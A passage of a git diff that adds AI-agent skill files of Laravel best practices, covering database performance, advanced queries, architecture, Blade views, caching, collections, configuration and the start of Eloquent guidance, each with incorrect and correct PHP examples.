+$action->set('title', 'My blog post');
+```
+
+### `__get`
+
+Accesses attributes as object properties.
+
+```php
+$action->title;
+```
+
+### `__set`
+
+Updates attributes as object properties.
+
+```php
+$action->title = 'My blog post';
+```
+
+### `__isset`
+
+Checks attribute existence as object properties.
+
+```php
+isset($action->title);
+```
+
+### `validateAttributes`
+
+Runs authorization and validation using action attributes and returns validated data.
+
+```php
+$validatedData = $action->validateAttributes();
+```
+
+## Methods used (`AttributeValidator`)
+
+`WithAttributes` uses the same authorization/validation hooks as `AsController`:
+
+- `prepareForValidation`
+- `authorize`
+- `rules`
+- `withValidator`
+- `afterValidator`
+- `getValidator`
+- `getValidationData`
+- `getValidationMessages`
+- `getValidationAttributes`
+- `getValidationRedirect`
+- `getValidationErrorBag`
+- `getValidationFailure`
+- `getAuthorizationFailure`
+
+## Example
+
+```php
+class CreateArticle
+{
+    use AsAction;
+    use WithAttributes;
+
+    public function rules(): array
+    {
+        return [
+            'title' => ['required', 'string', 'min:8'],
+            'body' => ['required', 'string'],
+        ];
+    }
+
+    public function handle(array $attributes): Article
+    {
+        return Article::create($attributes);
+    }
+}
+
+$action = CreateArticle::make()->fill([
+    'title' => 'My first post',
+    'body' => 'Hello world',
+]);
+
+$validated = $action->validateAttributes();
+$article = $action->handle($validated);
+```
+
+## Checklist
+
+- Attribute keys are explicit and stable.
+- Validation rules match expected attribute shape.
+- `validateAttributes()` is called before side effects when needed.
+- Validation/authorization hooks are tested in focused unit tests.
+
+## Common pitfalls
+
+- Mixing attribute-based and argument-based flows inconsistently in the same action.
+- Assuming route params override request input in `fillFromRequest` (they do not).
+- Skipping `validateAttributes()` when using external input.
+
+## References
+
+- https://www.laravelactions.com/2.x/with-attributes.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/SKILL.md b/.claude/skills/laravel-best-practices/SKILL.md
new file mode 100644
index 000000000..99018f3ae
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/SKILL.md
@@ -0,0 +1,190 @@
+---
+name: laravel-best-practices
+description: "Apply this skill whenever writing, reviewing, or refactoring Laravel PHP code. This includes creating or modifying controllers, models, migrations, form requests, policies, jobs, scheduled commands, service classes, and Eloquent queries. Triggers for N+1 and query performance issues, caching strategies, authorization and security patterns, validation, error handling, queue and job configuration, route definitions, and architectural decisions. Also use for Laravel code reviews and refactoring existing Laravel code to follow best practices. Covers any task involving Laravel backend PHP code patterns."
+license: MIT
+metadata:
+  author: laravel
+---
+
+# Laravel Best Practices
+
+Best practices for Laravel, prioritized by impact. Each rule teaches what to do and why. For exact API syntax, verify with `search-docs`.
+
+## Consistency First
+
+Before applying any rule, check what the application already does. Laravel offers multiple valid approaches — the best choice is the one the codebase already uses, even if another pattern would be theoretically better. Inconsistency is worse than a suboptimal pattern.
+
+Check sibling files, related controllers, models, or tests for established patterns. If one exists, follow it — don't introduce a second way. These rules are defaults for when no pattern exists yet, not overrides.
+
+## Quick Reference
+
+### 1. Database Performance → `rules/db-performance.md`
+
+- Eager load with `with()` to prevent N+1 queries
+- Enable `Model::preventLazyLoading()` in development
+- Select only needed columns, avoid `SELECT *`
+- `chunk()` / `chunkById()` for large datasets
+- Index columns used in `WHERE`, `ORDER BY`, `JOIN`
+- `withCount()` instead of loading relations to count
+- `cursor()` for memory-efficient read-only iteration
+- Never query in Blade templates
+
+### 2. Advanced Query Patterns → `rules/advanced-queries.md`
+
+- `addSelect()` subqueries over eager-loading entire has-many for a single value
+- Dynamic relationships via subquery FK + `belongsTo`
+- Conditional aggregates (`CASE WHEN` in `selectRaw`) over multiple count queries
+- `setRelation()` to prevent circular N+1 queries
+- `whereIn` + `pluck()` over `whereHas` for better index usage
+- Two simple queries can beat one complex query
+- Compound indexes matching `orderBy` column order
+- Correlated subqueries in `orderBy` for has-many sorting (avoid joins)
+
+### 3. Security → `rules/security.md`
+
+- Define `$fillable` or `$guarded` on every model, authorize every action via policies or gates
+- No raw SQL with user input — use Eloquent or query builder
+- `{{ }}` for output escaping, `@csrf` on all POST/PUT/DELETE forms, `throttle` on auth and API routes
+- Validate MIME type, extension, and size for file uploads
+- Never commit `.env`, use `config()` for secrets, `encrypted` cast for sensitive DB fields
+
+### 4. Caching → `rules/caching.md`
+
+- `Cache::remember()` over manual get/put
+- `Cache::flexible()` for stale-while-revalidate on high-traffic data
+- `Cache::memo()` to avoid redundant cache hits within a request
+- Cache tags to invalidate related groups
+- `Cache::add()` for atomic conditional writes
+- `once()` to memoize per-request or per-object lifetime
+- `Cache::lock()` / `lockForUpdate()` for race conditions
+- Failover cache stores in production
+
+### 5. Eloquent Patterns → `rules/eloquent.md`
+
+- Correct relationship types with return type hints
+- Local scopes for reusable query constraints
+- Global scopes sparingly — document their existence
+- Attribute casts in the `casts()` method
+- Cast date columns, use Carbon instances in templates
+- `whereBelongsTo($model)` for cleaner queries
+- Never hardcode table names — use `(new Model)->getTable()` or Eloquent queries
+
+### 6. Validation & Forms → `rules/validation.md`
+
+- Form Request classes, not inline validation
+- Array notation `['required', 'email']` for new code; follow existing convention
+- `$request->validated()` only — never `$request->all()`
+- `Rule::when()` for conditional validation
+- `after()` instead of `withValidator()`
+
+### 7. Configuration → `rules/config.md`
+
+- `env()` only inside config files
+- `App::environment()` or `app()->isProduction()`
+- Config, lang files, and constants over hardcoded text
+
+### 8. Testing Patterns → `rules/testing.md`
+
+- `LazilyRefreshDatabase` over `RefreshDatabase` for speed
+- `assertModelExists()` over raw `assertDatabaseHas()`
+- Factory states and sequences over manual overrides
+- Use fakes (`Event::fake()`, `Exceptions::fake()`, etc.) — but always after factory setup, not before
+- `recycle()` to share relationship instances across factories
+
+### 9. Queue & Job Patterns → `rules/queue-jobs.md`
+
+- `retry_after` must exceed job `timeout`; use exponential backoff `[1, 5, 10]`
+- `ShouldBeUnique` to prevent duplicates; `WithoutOverlapping::untilProcessing()` for concurrency
+- Always implement `failed()`; with `retryUntil()`, set `$tries = 0`
+- `RateLimited` middleware for external API calls; `Bus::batch()` for related jobs
+- Horizon for complex multi-queue scenarios
+
+### 10. Routing & Controllers → `rules/routing.md`
+
+- Implicit route model binding
+- Scoped bindings for nested resources
+- `Route::resource()` or `apiResource()`
+- Methods under 10 lines — extract to actions/services
+- Type-hint Form Requests for auto-validation
+
+### 11. HTTP Client → `rules/http-client.md`
+
+- Explicit `timeout` and `connectTimeout` on every request
+- `retry()` with exponential backoff for external APIs
+- Check response status or use `throw()`
+- `Http::pool()` for concurrent independent requests
+- `Http::fake()` and `preventStrayRequests()` in tests
+
+### 12. Events, Notifications & Mail → `rules/events-notifications.md`, `rules/mail.md`
+
+- Event discovery over manual registration; `event:cache` in production
+- `ShouldDispatchAfterCommit` / `afterCommit()` inside transactions
+- Queue notifications and mailables with `ShouldQueue`
+- On-demand notifications for non-user recipients
+- `HasLocalePreference` on notifiable models
+- `assertQueued()` not `assertSent()` for queued mailables
+- Markdown mailables for transactional emails
+
+### 13. Error Handling → `rules/error-handling.md`
+
+- `report()`/`render()` on exception classes or in `bootstrap/app.php` — follow existing pattern
+- `ShouldntReport` for exceptions that should never log
+- Throttle high-volume exceptions to protect log sinks
+- `dontReportDuplicates()` for multi-catch scenarios
+- Force JSON rendering for API routes
+- Structured context via `context()` on exception classes
+
+### 14. Task Scheduling → `rules/scheduling.md`
+
+- `withoutOverlapping()` on variable-duration tasks
+- `onOneServer()` on multi-server deployments
+- `runInBackground()` for concurrent long tasks
+- `environments()` to restrict to appropriate environments
+- `takeUntilTimeout()` for time-bounded processing
+- Schedule groups for shared configuration
+
+### 15. Architecture → `rules/architecture.md`
+
+- Single-purpose Action classes; dependency injection over `app()` helper
+- Prefer official Laravel packages and follow conventions, don't override defaults
+- Default to `ORDER BY id DESC` or `created_at DESC`; `mb_*` for UTF-8 safety
+- `defer()` for post-response work; `Context` for request-scoped data; `Concurrency::run()` for parallel execution
+
+### 16. Migrations → `rules/migrations.md`
+
+- Generate migrations with `php artisan make:migration`
+- `constrained()` for foreign keys
+- Never modify migrations that have run in production
+- Add indexes in the migration, not as an afterthought
+- Mirror column defaults in model `$attributes`
+- Reversible `down()` by default; forward-fix migrations for intentionally irreversible changes
+- One concern per migration — never mix DDL and DML
+
+### 17. Collections → `rules/collections.md`
+
+- Higher-order messages for simple collection operations
+- `cursor()` vs. `lazy()` — choose based on relationship needs
+- `lazyById()` when updating records while iterating
+- `toQuery()` for bulk operations on collections
+
+### 18. Blade & Views → `rules/blade-views.md`
+
+- `$attributes->merge()` in component templates
+- Blade components over `@include`; `@pushOnce` for per-component scripts
+- View Composers for shared view data
+- `@aware` for deeply nested component props
+
+### 19. Conventions & Style → `rules/style.md`
+
+- Follow Laravel naming conventions for all entities
+- Prefer Laravel helpers (`Str`, `Arr`, `Number`, `Uri`, `Str::of()`, `$request->string()`) over raw PHP functions
+- No JS/CSS in Blade, no HTML in PHP classes
+- Code should be readable; comments only for config files
+
+## How to Apply
+
+Always use a sub-agent to read rule files and explore this skill's content.
+
+1. Identify the file type and select relevant sections (e.g., migration → §16, controller → §1, §3, §5, §6, §10)
+2. Check sibling files for existing patterns — follow those first per Consistency First
+3. Verify API syntax with `search-docs` for the installed Laravel version
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/advanced-queries.md b/.claude/skills/laravel-best-practices/rules/advanced-queries.md
new file mode 100644
index 000000000..920714a14
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/advanced-queries.md
@@ -0,0 +1,106 @@
+# Advanced Query Patterns
+
+## Use `addSelect()` Subqueries for Single Values from Has-Many
+
+Instead of eager-loading an entire has-many relationship for a single value (like the latest timestamp), use a correlated subquery via `addSelect()`. This pulls the value directly in the main SQL query — zero extra queries.
+
+```php
+public function scopeWithLastLoginAt($query): void
+{
+    $query->addSelect([
+        'last_login_at' => Login::select('created_at')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->withCasts(['last_login_at' => 'datetime']);
+}
+```
+
+## Create Dynamic Relationships via Subquery FK
+
+Extend the `addSelect()` pattern to fetch a foreign key via subquery, then define a `belongsTo` relationship on that virtual attribute. This provides a fully-hydrated related model without loading the entire collection.
+
+```php
+public function lastLogin(): BelongsTo
+{
+    return $this->belongsTo(Login::class);
+}
+
+public function scopeWithLastLogin($query): void
+{
+    $query->addSelect([
+        'last_login_id' => Login::select('id')
+            ->whereColumn('user_id', 'users.id')
+            ->latest()
+            ->take(1),
+    ])->with('lastLogin');
+}
+```
+
+## Use Conditional Aggregates Instead of Multiple Count Queries
+
+Replace N separate `count()` queries with a single query using `CASE WHEN` inside `selectRaw()`. Use `toBase()` to skip model hydration when you only need scalar values.
+
+```php
+$statuses = Feature::toBase()
+    ->selectRaw("count(case when status = 'Requested' then 1 end) as requested")
+    ->selectRaw("count(case when status = 'Planned' then 1 end) as planned")
+    ->selectRaw("count(case when status = 'Completed' then 1 end) as completed")
+    ->first();
+```
+
+## Use `setRelation()` to Prevent Circular N+1
+
+When a parent model is eager-loaded with its children, and the view also needs `$child->parent`, use `setRelation()` to inject the already-loaded parent rather than letting Eloquent fire N additional queries.
+
+```php
+$feature->load('comments.user');
+$feature->comments->each->setRelation('feature', $feature);
+```
+
+## Prefer `whereIn` + Subquery Over `whereHas`
+
+`whereHas()` emits a correlated `EXISTS` subquery that re-executes per row. Using `whereIn()` with a `select('id')` subquery lets the database use an index lookup instead, without loading data into PHP memory.
+
+Incorrect (correlated EXISTS re-executes per row):
+
+```php
+$query->whereHas('company', fn ($q) => $q->where('name', 'like', $term));
+```
+
+Correct (index-friendly subquery, no PHP memory overhead):
+
+```php
+$query->whereIn('company_id', Company::where('name', 'like', $term)->select('id'));
+```
+
+## Sometimes Two Simple Queries Beat One Complex Query
+
+Running a small, targeted secondary query and passing its results via `whereIn` is often faster than a single complex correlated subquery or join. The additional round-trip is worthwhile when the secondary query is highly selective and uses its own index.
+
+## Use Compound Indexes Matching `orderBy` Column Order
+
+When ordering by multiple columns, create a single compound index in the same column order as the `ORDER BY` clause. Individual single-column indexes cannot combine for multi-column sorts — the database will filesort without a compound index.
+
+```php
+// Migration
+$table->index(['last_name', 'first_name']);
+
+// Query — column order must match the index
+User::query()->orderBy('last_name')->orderBy('first_name')->paginate();
+```
+
+## Use Correlated Subqueries for Has-Many Ordering
+
+When sorting by a value from a has-many relationship, avoid joins (they duplicate rows). Use a correlated subquery inside `orderBy()` instead, paired with an `addSelect` scope for eager loading.
+
+```php
+public function scopeOrderByLastLogin($query): void
+{
+    $query->orderByDesc(Login::select('created_at')
+        ->whereColumn('user_id', 'users.id')
+        ->latest()
+        ->take(1)
+    );
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/architecture.md b/.claude/skills/laravel-best-practices/rules/architecture.md
new file mode 100644
index 000000000..165056422
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/architecture.md
@@ -0,0 +1,202 @@
+# Architecture Best Practices
+
+## Single-Purpose Action Classes
+
+Extract discrete business operations into invokable Action classes.
+
+```php
+class CreateOrderAction
+{
+    public function __construct(private InventoryService $inventory) {}
+
+    public function execute(array $data): Order
+    {
+        $order = Order::create($data);
+        $this->inventory->reserve($order);
+
+        return $order;
+    }
+}
+```
+
+## Use Dependency Injection
+
+Always use constructor injection. Avoid `app()` or `resolve()` inside classes.
+
+Incorrect:
+```php
+class OrderController extends Controller
+{
+    public function store(StoreOrderRequest $request)
+    {
+        $service = app(OrderService::class);
+
+        return $service->create($request->validated());
+    }
+}
+```
+
+Correct:
+```php
+class OrderController extends Controller
+{
+    public function __construct(private OrderService $service) {}
+
+    public function store(StoreOrderRequest $request)
+    {
+        return $this->service->create($request->validated());
+    }
+}
+```
+
+## Code to Interfaces
+
+Depend on contracts at system boundaries (payment gateways, notification channels, external APIs) for testability and swappability.
+
+Incorrect (concrete dependency):
+```php
+class OrderService
+{
+    public function __construct(private StripeGateway $gateway) {}
+}
+```
+
+Correct (interface dependency):
+```php
+interface PaymentGateway
+{
+    public function charge(int $amount, string $customerId): PaymentResult;
+}
+
+class OrderService
+{
+    public function __construct(private PaymentGateway $gateway) {}
+}
+```
+
+Bind in a service provider:
+
+```php
+$this->app->bind(PaymentGateway::class, StripeGateway::class);
+```
+
+## Default Sort by Descending
+
+When no explicit order is specified, sort by `id` or `created_at` descending. Explicit ordering prevents cross-database inconsistencies between MySQL and Postgres.
+
+Incorrect:
+```php
+$posts = Post::paginate();
+```
+
+Correct:
+```php
+$posts = Post::latest()->paginate();
+```
+
+## Use Atomic Locks for Race Conditions
+
+Prevent race conditions with `Cache::lock()` or `lockForUpdate()`.
+
+```php
+Cache::lock('order-processing-'.$order->id, 10)->block(5, function () use ($order) {
+    $order->process();
+});
+
+// Or at query level
+$product = Product::where('id', $id)->lockForUpdate()->first();
+```
+
+## Use `mb_*` String Functions
+
+When no Laravel helper exists, prefer `mb_strlen`, `mb_strtolower`, etc. for UTF-8 safety. Standard PHP string functions count bytes, not characters.
+
+Incorrect:
+```php
+strlen('José');          // 5 (bytes, not characters)
+strtolower('MÜNCHEN');  // 'mÜnchen' — fails on multibyte
+```
+
+Correct:
+```php
+mb_strlen('José');             // 4 (characters)
+mb_strtolower('MÜNCHEN');     // 'münchen'
+
+// Prefer Laravel's Str helpers when available
+Str::length('José');          // 4
+Str::lower('MÜNCHEN');        // 'münchen'
+```
+
+## Use `defer()` for Post-Response Work
+
+For lightweight tasks that don't need to survive a crash (logging, analytics, cleanup), use `defer()` instead of dispatching a job. The callback runs after the HTTP response is sent — no queue overhead.
+
+Incorrect (job overhead for trivial work):
+```php
+dispatch(new LogPageView($page));
+```
+
+Correct (runs after response, same process):
+```php
+defer(fn () => PageView::create(['page_id' => $page->id, 'user_id' => auth()->id()]));
+```
+
+Use jobs when the work must survive process crashes or needs retry logic. Use `defer()` for fire-and-forget work.
+
+## Use `Context` for Request-Scoped Data
+
+The `Context` facade passes data through the entire request lifecycle — middleware, controllers, jobs, logs — without passing arguments manually.
+
+```php
+// In middleware
+Context::add('tenant_id', $request->header('X-Tenant-ID'));
+
+// Anywhere later — controllers, jobs, log context
+$tenantId = Context::get('tenant_id');
+```
+
+Context data automatically propagates to queued jobs and is included in log entries. Use `Context::addHidden()` for sensitive data that should be available in queued jobs but excluded from log context. If data must not leave the current process, do not store it in `Context`.
+
+## Use `Concurrency::run()` for Parallel Execution
+
+Run independent operations in parallel using child processes — no async libraries needed.
+
+```php
+use Illuminate\Support\Facades\Concurrency;
+
+[$users, $orders] = Concurrency::run([
+    fn () => User::count(),
+    fn () => Order::where('status', 'pending')->count(),
+]);
+```
+
+Each closure runs in a separate process with full Laravel access. Use for independent database queries, API calls, or computations that would otherwise run sequentially.
+
+## Convention Over Configuration
+
+Follow Laravel conventions. Don't override defaults unnecessarily.
+
+Incorrect:
+```php
+class Customer extends Model
+{
+    protected $table = 'Customer';
+    protected $primaryKey = 'customer_id';
+
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class, 'role_customer', 'customer_id', 'role_id');
+    }
+}
+```
+
+Correct:
+```php
+class Customer extends Model
+{
+    public function roles(): BelongsToMany
+    {
+        return $this->belongsToMany(Role::class);
+    }
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/blade-views.md b/.claude/skills/laravel-best-practices/rules/blade-views.md
new file mode 100644
index 000000000..c6f8aaf1e
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/blade-views.md
@@ -0,0 +1,36 @@
+# Blade & Views Best Practices
+
+## Use `$attributes->merge()` in Component Templates
+
+Hardcoding classes prevents consumers from adding their own. `merge()` combines class attributes cleanly.
+
+```blade
+<div {{ $attributes->merge(['class' => 'alert alert-'.$type]) }}>
+    {{ $message }}
+</div>
+```
+
+## Use `@pushOnce` for Per-Component Scripts
+
+If a component renders inside a `@foreach`, `@push` inserts the script N times. `@pushOnce` guarantees it's included exactly once.
+
+## Prefer Blade Components Over `@include`
+
+`@include` shares all parent variables implicitly (hidden coupling). Components have explicit props, attribute bags, and slots.
+
+## Use View Composers for Shared View Data
+
+If every controller rendering a sidebar must pass `$categories`, that's duplicated code. A View Composer centralizes it.
+
+## Use Blade Fragments for Partial Re-Renders (htmx/Turbo)
+
+A single view can return either the full page or just a fragment, keeping routing clean.
+
+```php
+return view('dashboard', compact('users'))
+    ->fragmentIf($request->hasHeader('HX-Request'), 'user-list');
+```
+
+## Use `@aware` for Deeply Nested Component Props
+
+Avoids re-passing parent props through every level of nested components.
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/caching.md b/.claude/skills/laravel-best-practices/rules/caching.md
new file mode 100644
index 000000000..eb3ef3e62
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/caching.md
@@ -0,0 +1,70 @@
+# Caching Best Practices
+
+## Use `Cache::remember()` Instead of Manual Get/Put
+
+Atomic pattern prevents race conditions and removes boilerplate.
+
+Incorrect:
+```php
+$val = Cache::get('stats');
+if (! $val) {
+    $val = $this->computeStats();
+    Cache::put('stats', $val, 60);
+}
+```
+
+Correct:
+```php
+$val = Cache::remember('stats', 60, fn () => $this->computeStats());
+```
+
+## Use `Cache::flexible()` for Stale-While-Revalidate
+
+On high-traffic keys, one user always gets a slow response when the cache expires. `flexible()` serves slightly stale data while refreshing in the background.
+
+Incorrect: `Cache::remember('users', 300, fn () => User::all());`
+
+Correct: `Cache::flexible('users', [300, 600], fn () => User::all());` — fresh for 5 min, stale-but-served up to 10 min, refreshes via deferred function.
+
+## Use `Cache::memo()` to Avoid Redundant Hits Within a Request
+
+If the same cache key is read multiple times per request (e.g., a service called from multiple places), `memo()` stores the resolved value in memory.
+
+`Cache::memo()->get('settings');` — 5 calls = 1 Redis round-trip instead of 5.
+
+## Use Cache Tags to Invalidate Related Groups
+
+Without tags, invalidating a group of entries requires tracking every key. Tags let you flush atomically. Only works with `redis`, `memcached`, `dynamodb` — not `file` or `database`.
+
+```php
+Cache::tags(['user-1'])->flush();
+```
+
+## Use `Cache::add()` for Atomic Conditional Writes
+
+`add()` only writes if the key does not exist — atomic, no race condition between checking and writing.
+
+Incorrect: `if (! Cache::has('lock')) { Cache::put('lock', true, 10); }`
+
+Correct: `Cache::add('lock', true, 10);`
+
+## Use `once()` for Per-Request Memoization
+
+`once()` memoizes a function's return value for the lifetime of the object (or request for closures). Unlike `Cache::memo()`, it doesn't hit the cache store at all — pure in-memory.
+
+```php
+public function roles(): Collection
+{
+    return once(fn () => $this->loadRoles());
+}
+```
+
+Multiple calls return the cached result without re-executing. Use `once()` for expensive computations called multiple times per request. Use `Cache::memo()` when you also want cross-request caching.
+
+## Configure Failover Cache Stores in Production
+
+If Redis goes down, the app falls back to a secondary store automatically.
+
+```php
+'failover' => ['driver' => 'failover', 'stores' => ['redis', 'database']],
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/collections.md b/.claude/skills/laravel-best-practices/rules/collections.md
new file mode 100644
index 000000000..14f683d32
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/collections.md
@@ -0,0 +1,44 @@
+# Collection Best Practices
+
+## Use Higher-Order Messages for Simple Operations
+
+Incorrect:
+```php
+$users->each(function (User $user) {
+    $user->markAsVip();
+});
+```
+
+Correct: `$users->each->markAsVip();`
+
+Works with `each`, `map`, `sum`, `filter`, `reject`, `contains`, etc.
+
+## Choose `cursor()` vs. `lazy()` Correctly
+
+- `cursor()` — one model in memory, but cannot eager-load relationships (N+1 risk).
+- `lazy()` — chunked pagination returning a flat LazyCollection, supports eager loading.
+
+Incorrect: `User::with('roles')->cursor()` — eager loading silently ignored.
+
+Correct: `User::with('roles')->lazy()` for relationship access; `User::cursor()` for attribute-only work.
+
+## Use `lazyById()` When Updating Records While Iterating
+
+`lazy()` uses offset pagination — updating records during iteration can skip or double-process. `lazyById()` uses `id > last_id`, safe against mutation.
+
+## Use `toQuery()` for Bulk Operations on Collections
+
+Avoids manual `whereIn` construction.
+
+Incorrect: `User::whereIn('id', $users->pluck('id'))->update([...]);`
+
+Correct: `$users->toQuery()->update([...]);`
+
+## Use `#[CollectedBy]` for Custom Collection Classes
+
+More declarative than overriding `newCollection()`.
+
+```php
+#[CollectedBy(UserCollection::class)]
+class User extends Model {}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/config.md b/.claude/skills/laravel-best-practices/rules/config.md
new file mode 100644
index 000000000..8fd8f536f
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/config.md
@@ -0,0 +1,73 @@
+# Configuration Best Practices
+
+## `env()` Only in Config Files
+
+Direct `env()` calls return `null` when config is cached.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'key' => env('API_KEY'),
+
+// Application code
+$key = config('services.key');
+```
+
+## Use Encrypted Env or External Secrets
+
+Never store production secrets in plain `.env` files in version control.
+
+Incorrect:
+```bash
+
+# .env committed to repo or shared in Slack
+
+STRIPE_SECRET=sk_live_abc123
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI
+```
+
+Correct:
+```bash
+php artisan env:encrypt --env=production --readable
+php artisan env:decrypt --env=production
+```
+
+For cloud deployments, prefer the platform's native secret store (AWS Secrets Manager, Vault, etc.) and inject at runtime.
+
+## Use `App::environment()` for Environment Checks
+
+Incorrect:
+```php
+if (env('APP_ENV') === 'production') {
+```
+
+Correct:
+```php
+if (app()->isProduction()) {
+// or
+if (App::environment('production')) {
+```
+
+## Use Constants and Language Files
+
+Use class constants instead of hardcoded magic strings for model states, types, and statuses.
+
+```php
+// Incorrect
+return $this->type === 'normal';
+
+// Correct
+return $this->type === self::TYPE_NORMAL;
+```
+
+If the application already uses language files for localization, use `__()` for user-facing strings too. Do not introduce language files purely for English-only apps — simple string literals are fine there.
+
+```php
+// Only when lang files already exist in the project
+return back()->with('message', __('app.article_added'));
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/db-performance.md b/.claude/skills/laravel-best-practices/rules/db-performance.md
new file mode 100644
index 000000000..8fb719377
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/db-performance.md
@@ -0,0 +1,192 @@
+# Database Performance Best Practices
+
+## Always Eager Load Relationships
+
+Lazy loading causes N+1 query problems — one query per loop iteration. Always use `with()` to load relationships upfront.
+
+Incorrect (N+1 — executes 1 + N queries):
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Correct (2 queries total):
+```php
+$posts = Post::with('author')->get();
+foreach ($posts as $post) {
+    echo $post->author->name;
+}
+```
+
+Constrain eager loads to select only needed columns (always include the foreign key):
+
+```php
+$users = User::with(['posts' => function ($query) {
+    $query->select('id', 'user_id', 'title')
+          ->where('published', true)
+          ->latest()
+          ->limit(10);
+}])->get();
+```
+
+## Prevent Lazy Loading in Development
+
+Enable this in `AppServiceProvider::boot()` to catch N+1 issues during development.
+
+```php
+public function boot(): void
+{
+    Model::preventLazyLoading(! app()->isProduction());
+}
+```
+
+Throws `LazyLoadingViolationException` when a relationship is accessed without being eager-loaded.
+
+## Select Only Needed Columns
+
+Avoid `SELECT *` — especially when tables have large text or JSON columns.
+
+Incorrect:
+```php
+$posts = Post::with('author')->get();
+```
+
+Correct:
+```php
+$posts = Post::select('id', 'title', 'user_id', 'created_at')
+    ->with(['author:id,name,avatar'])
+    ->get();
+```
+
+When selecting columns on eager-loaded relationships, always include the foreign key column or the relationship won't match.
+
+## Chunk Large Datasets
+
+Never load thousands of records at once. Use chunking for batch processing.
+
+Incorrect:
+```php
+$users = User::all();
+foreach ($users as $user) {
+    $user->notify(new WeeklyDigest);
+}
+```
+
+Correct:
+```php
+User::where('subscribed', true)->chunk(200, function ($users) {
+    foreach ($users as $user) {
+        $user->notify(new WeeklyDigest);
+    }
+});
+```
+
+Use `chunkById()` when modifying records during iteration — standard `chunk()` uses OFFSET which shifts when rows change:
+
+```php
+User::where('active', false)->chunkById(200, function ($users) {
+    $users->each->delete();
+});
+```
+
+## Add Database Indexes
+
+Index columns that appear in `WHERE`, `ORDER BY`, `JOIN`, and `GROUP BY` clauses.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->index()->constrained();
+    $table->string('status')->index();
+    $table->timestamps();
+    $table->index(['status', 'created_at']);
+});
+```
+
+Add composite indexes for common query patterns (e.g., `WHERE status = ? ORDER BY created_at`).
+
+## Use `withCount()` for Counting Relations
+
+Never load entire collections just to count them.
+
+Incorrect:
+```php
+$posts = Post::all();
+foreach ($posts as $post) {
+    echo $post->comments->count();
+}
+```
+
+Correct:
+```php
+$posts = Post::withCount('comments')->get();
+foreach ($posts as $post) {
+    echo $post->comments_count;
+}
+```
+
+Conditional counting:
+
+```php
+$posts = Post::withCount([
+    'comments',
+    'comments as approved_comments_count' => function ($query) {
+        $query->where('approved', true);
+    },
+])->get();
+```
+
+## Use `cursor()` for Memory-Efficient Iteration
+
+For read-only iteration over large result sets, `cursor()` loads one record at a time via a PHP generator.
+
+Incorrect:
+```php
+$users = User::where('active', true)->get();
+```
+
+Correct:
+```php
+foreach (User::where('active', true)->cursor() as $user) {
+    ProcessUser::dispatch($user->id);
+}
+```
+
+Use `cursor()` for read-only iteration. Use `chunk()` / `chunkById()` when modifying records.
+
+## No Queries in Blade Templates
+
+Never execute queries in Blade templates. Pass data from controllers.
+
+Incorrect:
+```blade
+@foreach (User::all() as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
+
+Correct:
+```php
+// Controller
+$users = User::with('profile')->get();
+return view('users.index', compact('users'));
+```
+
+```blade
+@foreach ($users as $user)
+    {{ $user->profile->name }}
+@endforeach
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/eloquent.md b/.claude/skills/laravel-best-practices/rules/eloquent.md
new file mode 100644
index 000000000..09cd66a05
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/eloquent.md
@@ -0,0 +1,148 @@
+# Eloquent Best Practices
+
+## Use Correct Relationship Types
+
+Use `hasMany`, `belongsTo`, `morphMany`, etc. with proper return type hints.
+
+```php
+public function comments(): HasMany
+{
+    return $this->hasMany(Comment::class);
+}
+
+public function author(): BelongsTo
+{
+    return $this->belongsTo(User::class, 'user_id');
+}
+```
+
+## Use Local Scopes for Reusable Queries
+
+Extract reusable query constraints into local scopes to avoid duplication.
+
+Incorrect:
+```php
+$active = User::where('verified', true)->whereNotNull('activated_at')->get();
+$articles = Article::whereHas('user', function ($q) {
+    $q->where('verified', true)->whereNotNull('activated_at');
+})->get();
+```
+
+Correct:
+```php
+public function scopeActive(Builder $query): Builder
+{
+    return $query->where('verified', true)->whereNotNull('activated_at');
+}
+
+// Usage
+$active = User::active()->get();
+$articles = Article::whereHas('user', fn ($q) => $q->active())->get();
+```
+
+## Apply Global Scopes Sparingly
+
+Global scopes silently modify every query on the model, making debugging difficult. Prefer local scopes and reserve global scopes for truly universal constraints like soft deletes or multi-tenancy.
+
+Incorrect (global scope for a conditional filter):
+```php
+class PublishedScope implements Scope
+{
+    public function apply(Builder $builder, Model $model): void
+    {
+        $builder->where('published', true);
+    }
+}
+// Now admin panels, reports, and background jobs all silently skip drafts
+```
+
+Correct (local scope you opt into):
+```php
+public function scopePublished(Builder $query): Builder
+{
+    return $query->where('published', true);
+}
+
+Post::published()->paginate(); // Explicit
+Post::paginate(); // Admin sees all
+```
+
+## Define Attribute Casts
+
+Use the `casts()` method (or `$casts` property following project convention) for automatic type conversion.
+
+```php
+protected function casts(): array
+{
+    return [
